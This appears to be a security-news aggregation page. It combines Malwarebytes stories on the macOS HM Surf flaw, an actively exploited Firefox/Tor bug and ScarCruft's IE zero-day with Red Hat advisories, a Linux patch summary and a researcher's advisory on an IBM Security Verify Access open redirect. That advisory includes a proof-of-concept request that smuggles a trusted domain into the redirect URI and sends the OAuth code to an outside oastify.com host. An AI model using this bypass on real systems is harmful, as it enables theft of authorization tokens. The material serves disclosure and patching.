A list of topics we covered in the week of October 14 to October 20 of 2024

October 18, 2024 - Microsoft disclosed details about the HM Surf vulnerability that could allow an attacker to gain access to the user’s data in Safari

October 17, 2024 - Sure, you can request a deletion of your data from 23andMe, but that doesn’t mean the company will delete it entirely.

October 16, 2024 - Mozilla warns that a vulnerability in Firefox and Tor Browser is actively being exploited against both browsers

October 15, 2024 - Typical AI supported scams are after your Google account by pretending to follow up on account recovery requests

October 15, 2024 - The US presidential election is stirring fears amongst a third of people who worry that their vote could be exposed to outsiders.

 A week in security (October 14 &#8211; October 20) 

Microsoft disclosed details about the HM Surf vulnerability that  could allow an attacker to gain access to the user’s data in Safari

The Microsoft Threat Intelligence team disclosed details about a macOS vulnerability, dubbed “HM Surf,” that could allow an attacker to gain access to the user’s data in Safari. The data the attacker could access without users’ consent includes browsed pages, along with the device’s camera, microphone, and location.

The vulnerability, tracked as CVE-2024-44133 was fixed in the September 16 update for Mac Studio (2022 and later), iMac (2019 and later), Mac Pro (2019 and later), Mac Mini (2018 and later), MacBook Air (2020 and later), MacBook Pro (2018 and later), and iMac Pro (2017 and later).

It is important to note that this vulnerability would only impact Mobile Device Management (MDM) managed devices. MDM managed devices are typically subject to centralized management and security policies set by the organization’s IT department.

Microsoft has dubbed the flaw “HM Surf.” By exploiting this vulnerability an attacker could bypass the macOS Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data.

Users may notice Safari’s TCC in action when they browse a website that requires access to the camera or the microphone. They may see a prompt like this one:

Image courtesy of Microsoft

What Microsoft discovered was that Safari maintains its own separate TCC policy which it maintains in various local files.

At that point Microsoft figured out it was possible to modify the sensitive files, by swapping the home directory of the current user back and forth. The home directory is protected by the TCC, but by changing the home directory, then change the file, and then making it the home directory again, Safari will use the modified files.

The exploit only works on Safari because third-party browsers such as Google Chrome, Mozilla Firefox, or Microsoft Edge do not have the same private entitlements as Apple applications. Therefore, those apps can’t bypass the macOS TCC checks.

Microsoft noted that it observed suspicious activity in the wild associated with the Adload adware that might be exploiting this vulnerability. But it could not be entirely sure whether the exact same exploit was used.

> “Since we weren’t able to observe the steps taken leading to the activity, we can’t fully determine if the Adload campaign is exploiting the HM surf vulnerability itself. Attackers using a similar method to deploy a prevalent threat raises the importance of having protection against attacks using this technique.”

We encourage macOS users to apply these security updates as soon as possible if they haven’t already.

Malwarebytes for Mac takes out malware, adware, spyware, and other threats before they can infect your machine and ruin your day. It’ll keep you safe online and your Mac running like it should.

 Unauthorized data access vulnerability in macOS is detailed by Microsoft 

IBM Security Verify Access versions 10.0.0 through 10.0.8 suffer from an OAUTH related open redirection vulnerability.

- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during  
OAuth Flow

======== < Table of Contents >  
================================================

  0. Overview  
  1. Detailed Description  
  2. Proof Of Concept  
  3. Solution  
  4. Disclosure Timeline  
  5. References  
  6. Credits  
  7. Legal Notices

======== < 0. Overview >  
======================================================

  Revision:  
    1.0

  Impact:  
    By persuading a victim to visit a specially crafted Web site, a remote  
    attacker could exploit this vulnerability to spoof the URL displayed  
    to redirect a user to a malicious Web site that would appear to be  
    trusted. This could allow the attacker to obtain highly sensitive  
    information or conduct further attacks against the victim.

  Severity:  
    NIST: High  
    IBM: Medium

  CVSS Score:  
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:  
    CVE-2024-35133

  Vendor:  
    IBM

  Affected Products:  
    IBM Security Verify Access  
    IBM Security Verify Access Docker

  Affected Versions:  
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network  
    security policy management solution. It provides end-to-end protection  
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security  
    Verify Access provides authentication, authorization, data security, and  
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:  
    Authentication ~ Provides a wide range of built-in authenticators and  
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected  
resources  
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure  
access  
    to private internal network-based resources by using the public  
Internet's  
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description >  
==========================================

  During a Penetration Test of the OAuth flow for a client, it was found an  
  Open Redirect vulnerability that can led to the leakage of the OAuth  
"code" variable.

  It was possible to bypass the parser's logic responsible for verifying the  
  correctness and the validity of the "redirect_uri" parameter during an  
OAuth  
  flow by leveraging RFC 3986 (3.2.1) providing a username and password  
directly  
  in the Uniform Resource Identifier (URI).

  By providing as the "username" field a legitimate and expected domain, it  
  was possible to bypass the whitelist filter used by "IBM Security Verify  
Access"  
  and cause an Open Redirect to any arbitrary domain controlled by the  
attacker,  
  not only altering the expected flow and redirect a user to a malicious  
  Web site that would appear to be trusted.

  This could allow the attacker to obtain highly sensitive like the OAuth  
"code"  
  token or conduct further attacks against the victim

======== < 2. Proof of Concepts >  
=============================================

===== REQUEST =====

[[  
  GET  
/oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+  
HTTP/1.1  
  Host: [REDACTED]  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101  
Firefox/115.0  
  Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
  Accept-Language: en-US,en;q=0.5  
  Accept-Encoding: gzip, deflate, br  
  Upgrade-Insecure-Requests: 1  
  Sec-Fetch-Dest: document  
  Sec-Fetch-Mode: navigate  
  Sec-Fetch-Site: same-origin  
  Sec-Fetch-User: ?1  
  Te: trailers  
  Connection: close  
]]

===== RESPONSE =====

[[  
  HTTP/1.1 302 Found  
  content-language: en-US  
  date: Tue, 19 Mar 2024 16:04:35 GMT  
  location:  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]  
  p3p: CP="NON CUR OTPi OUR NOR UNI"  
  x-frame-options: DENY  
  x-content-type-options: nosniff  
  cache-control: no-store  
  x-xss-protection: 1; mode=block  
  x-permitted-cross-domain-policies: none  
  cross-origin-resource-policy: same-site  
  content-security-policy: frame-ancestors 'none'  
  referrer-policy: no-referrer-when-downgrade  
  strict-transport-security: max-age=31536000; includeSubDomains  
  pragma: no-cache  
  Content-Length: 0.  
]]

======== < 3. Solution >  
======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline >  
===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio  
Garzia)  
  21/03/2024 - Vulnerability shared with the client who committed the  
Penetration Test on his infrastructure, relying on IBM SVA  
  02/04/2024 - Vulnerability shared with IBM  
  02/04/2024 - Vulnerability taken over by IBM  
  14/05/2024 - Vulnerability confirmed by IBM  
  18/07/2024 - Pre-release provided by IBM to the customer to verify the  
resolution of the vulnerability  
  27/08/2024 - Security Bulletin and vulnerability shared by IBM

======== < 5. References >  
====================================================

  (1)  
https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133  
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
  (4) https://cwe.mitre.org/data/definitions/178.html

======== < 6. Credits >  
=======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/  
    https://github.com/Ozozuz

======== < 7. Legal Notices >  
================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert  
  electronically. It may not be edited in any way without mine express  
  written consent. If you wish to reprint the whole or any  
  part of this alert in any other medium other than electronically,  
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate  
  at the time of publishing based on currently available information.  
  Use of the information constitutes acceptance for use in an AS IS  
  condition.  
  There are no warranties with regard to this information. Neither the  
  author nor the publisher accepts any liability for any direct,  
  indirect, or consequential loss or damage arising from use of,  
  or reliance on,this information.

IBM Security Verify Access 10.0.8 Open Redirection

October Linux Patch Wednesday. There are 248 vulnerabilities in total. Of these, 92 are in the Linux Kernel. 5 vulnerabilities with signs of exploitation in the wild: 🔻 Remote Code Execution – CUPS (CVE-2024-47176) and 4 more CUPS vulnerabilities that can also be used to enhance DoS attacks🔻 Remote Code Execution – Mozilla Firefox (CVE-2024-9680) […]

**October Linux Patch Wednesday.** There are 248 vulnerabilities in total. Of these, 92 are in the Linux Kernel.

5 vulnerabilities with signs of exploitation in the wild:

🔻 **Remote Code Execution** – CUPS (CVE-2024-47176) and 4 more CUPS vulnerabilities that can also be used to enhance DoS attacks  
🔻 **Remote Code Execution** – Mozilla Firefox (CVE-2024-9680)

For 10 vulnerabilities there are no signs of exploitation in the wild yet, but exploits exist. Among them, the following can be highlighted:

🔸 **Remote Code Execution** – Cacti (CVE-2024-43363)  
🔸 **Elevation of Privilege** – Linux Kernel (CVE-2024-46848)  
🔸 **Arbitrary File Reading** – Jenkins (CVE-2024-43044)  
🔸 **Denial of Service** – CUPS (CVE-2024-47850)  
🔸 **Cross Site Scripting** – Rollup JavaScript module (CVE-2024-47068)

🗒 Vulristics October Linux Patch Wednesday Report

На русском

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

October Linux Patch Wednesday

Red Hat Security Advisory 2024-8176-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8176.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:8176-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8176Issue date:         2024-10-16Revision:           03CVE Names:          CVE-2024-9680====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill) (CVE-2024-9680)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9680References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317442

Red Hat Security Advisory 2024-8176-03

Red Hat Security Advisory 2024-8169-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include bypass and denial of service vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8169.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:8169-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8169  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2024-9392  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.16/128.3 ()

* firefox: thunderbird: Specially crafted WebTransport requests could lead  
to denial of service (CVE-2024-9399)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131 and  
Thunderbird 131 (CVE-2024-9403)

* firefox: thunderbird: Potential directory upload bypass via clickjacking  
(CVE-2024-9397)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox  
ESR 115.16, Firefox ESR 128.3, Thunderbird 131, and Thunderbird 128.3  
(CVE-2024-9401)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox  
ESR 128.3, Thunderbird 131, and Thunderbird 128.3 (CVE-2024-9402)

* firefox: thunderbird: External protocol handlers could be enumerated via  
popups (CVE-2024-9398)

* firefox: thunderbird: Potential memory corruption during JIT compilation  
(CVE-2024-9400)

* firefox: thunderbird: Potential memory corruption may occur when cloning  
certain objects (CVE-2024-9396)

* firefox: thunderbird: Cross-origin access to PDF contents through  
multipart responses (CVE-2024-9393)

* firefox: thunderbird: Cross-origin access to JSON contents through  
multipart responses (CVE-2024-9394)

* firefox: thunderbird: Compromised content process can bypass site  
isolation (CVE-2024-9392)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-9392

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2314431  
https://bugzilla.redhat.com/show_bug.cgi?id=2315945  
https://bugzilla.redhat.com/show_bug.cgi?id=2315947  
https://bugzilla.redhat.com/show_bug.cgi?id=2315949  
https://bugzilla.redhat.com/show_bug.cgi?id=2315950  
https://bugzilla.redhat.com/show_bug.cgi?id=2315951  
https://bugzilla.redhat.com/show_bug.cgi?id=2315952  
https://bugzilla.redhat.com/show_bug.cgi?id=2315953  
https://bugzilla.redhat.com/show_bug.cgi?id=2315954  
https://bugzilla.redhat.com/show_bug.cgi?id=2315956  
https://bugzilla.redhat.com/show_bug.cgi?id=2315957  
https://bugzilla.redhat.com/show_bug.cgi?id=2315959

Red Hat Security Advisory 2024-8169-03

Red Hat Security Advisory 2024-8167-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8167.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:8167-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8167Issue date:         2024-10-16Revision:           03CVE Names:          CVE-2024-9680====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill)(CVE-2024-9680)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9680References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314431

Red Hat Security Advisory 2024-8167-03

Red Hat Security Advisory 2024-8166-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include bypass, denial of service, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8166.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:8166-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8166  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2024-9392  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

* thunderbird: 115.16/128.3 ()

* firefox: thunderbird: Specially crafted WebTransport requests could lead  
to denial of service (CVE-2024-9399)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131 and  
Thunderbird 131 (CVE-2024-9403)

* firefox: thunderbird: Potential directory upload bypass via clickjacking  
(CVE-2024-9397)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox  
ESR 115.16, Firefox ESR 128.3, Thunderbird 131, and Thunderbird 128.3  
(CVE-2024-9401)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox  
ESR 128.3, Thunderbird 131, and Thunderbird 128.3 (CVE-2024-9402)

* firefox: thunderbird: External protocol handlers could be enumerated via  
popups (CVE-2024-9398)

* firefox: thunderbird: Potential memory corruption during JIT compilation  
(CVE-2024-9400)

* firefox: thunderbird: Potential memory corruption may occur when cloning  
certain objects (CVE-2024-9396)

* firefox: thunderbird: Cross-origin access to PDF contents through  
multipart responses (CVE-2024-9393)

* firefox: thunderbird: Cross-origin access to JSON contents through  
multipart responses (CVE-2024-9394)

* firefox: thunderbird: Compromised content process can bypass site  
isolation (CVE-2024-9392)

* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill)  
(CVE-2024-9680)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-9392

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2314431  
https://bugzilla.redhat.com/show_bug.cgi?id=2315945  
https://bugzilla.redhat.com/show_bug.cgi?id=2315947  
https://bugzilla.redhat.com/show_bug.cgi?id=2315949  
https://bugzilla.redhat.com/show_bug.cgi?id=2315950  
https://bugzilla.redhat.com/show_bug.cgi?id=2315951  
https://bugzilla.redhat.com/show_bug.cgi?id=2315952  
https://bugzilla.redhat.com/show_bug.cgi?id=2315953  
https://bugzilla.redhat.com/show_bug.cgi?id=2315954  
https://bugzilla.redhat.com/show_bug.cgi?id=2315956  
https://bugzilla.redhat.com/show_bug.cgi?id=2315957  
https://bugzilla.redhat.com/show_bug.cgi?id=2315959  
https://bugzilla.redhat.com/show_bug.cgi?id=2317442

Red Hat Security Advisory 2024-8166-03

Mozilla warns that a vulnerability in Firefox and Tor Browser is actively being exploited against both browsers

Mozilla has announced a security fix for its Firefox browser which also impacts the closely related Tor Browser.

The new version fixes one critical security vulnerability which is reportedly under active exploitation. To address the flaw, both Mozilla and Tor recommend that users update their browsers to the most current versions available.

Firefox users that have automatic updates enabled should have the new version available as soon or shortly after they open the browser. Once you’re updated, your version number will be 131.0.3 or higher.

Other users can update their browser by following these instructions:

*   Click the menu button (3 horizontal stripes) at the right side of the Firefox toolbar, go to **Help**, and select **About Firefox/Tor Browser**. The About Mozilla Firefox/About Tor Browser window will open.
*   Firefox/Tor Browser will check for updates automatically. If an update is available, it will be downloaded.
*   You will be prompted when the download is complete, then click **Restart to update Firefox/Tor Browser.**

To update the Tor Browser you have to **Connect** first or it will fail to fetch the update. The latest version of Tor is 13.5.7.

Version number should be 13.5.7 or higher

The vulnerability, tracked as CVE-2024-9680, allows attackers to execute malicious code within the browser’s content process, which is the environment where it loads and renders web content.

About the vulnerability, Mozilla said:

> “An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild.”

Use after free (UAF) is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

The Animation Timeline interface of the Web Animations Application Programming Interface (API) represents the timeline of an animation. Where the timeline is a source of time values for synchronization purposes.

Exploitation is said to be relatively easy, requires no user interaction, and can be executed over the network.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Tor Browser and Firefox users should update to fix actively exploited vulnerability 

The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT.
The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser in Internet Explorer Mode.

Zero-Day / Windows Security

The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT.

The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser in Internet Explorer Mode. It was patched by Microsoft as part of its Patch Tuesday updates for August 2024.

However, successful exploitation requires an attacker to convince a user to click on a specially crafted URL in order to initiate the execution of malicious code.

The AhnLab Security Intelligence Center (ASEC) and the National Cyber Security Center (NCSC) of the Republic of Korea, which were credited with discovering and reporting the shortcoming, have assigned the activity cluster the name Operation Code on Toast.

The organizations are tracking ScarCruft under the moniker TA-RedAnt, which was previously referred to as RedEyes. It's also known in the wider cybersecurity community under the names APT37, InkySquid, Reaper, Ricochet Chollima, and Ruby Sleet.

The zero-day attack is "characterized by the exploitation of a specific 'toast' advertisement program that is commonly bundled with various free software," ASEC said in a statement shared with The Hacker News. "'Toast' ads, in Korea, refers to pop-up notifications that appear at the bottom of the PC screen, typically in the lower-right corner."

The attack chain documented by the South Korean cybersecurity firm shows that the threat actors compromised the server of an unnamed domestic advertising agency that supplies content to the toast ads with the goal of injecting exploit code into the script of the advertisement content.

The vulnerability is said to have been triggered when the toast program downloads and renders the booby-trapped content from the server.

"The attacker targeted a specific toast program that utilizes an unsupported \[Internet Explorer\] module to download advertisement content, ASEC and NCSC said in a joint threat analysis report.

"This vulnerability causes the JavaScript Engine of IE (jscript9.dll) to improperly interpret data types, resulting in a type confusion error. The attacker exploited this vulnerability to infect PCs with the vulnerable toast program installed. Once infected, PCs were subjected to various malicious activities, including remote access."

The latest version of RokRAT is capable of enumerating files, terminating arbitrary processes, receiving and executing commands received from a remote server, and gathering data from various applications such as KakaoTalk, WeChat, and browsers like Chrome, Edge, Opera, Naver Wales, and Firefox.

RokRAT is also notable for using legitimate cloud services like Dropbox, Google Cloud, pCloud, and Yandex Cloud as its command-and-control server, thereby allowing it to blend in with regular traffic in enterprise environments.

This is not the first time ScarCruft has weaponized vulnerabilities in the legacy browser to deliver follow-on malware. In recent years, it has been attributed to the exploitation of CVE-2020-1380, another memory corruption flaw in Scripting Engine, and CVE-2022-41128, a remote code execution vulnerability in Windows Scripting Languages.

"The technological level of North Korean hacking organizations has become more advanced, and they are exploiting various vulnerabilities in addition to \[Internet Explorer\]," the report said. "Accordingly, users should update their operating system and software security."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox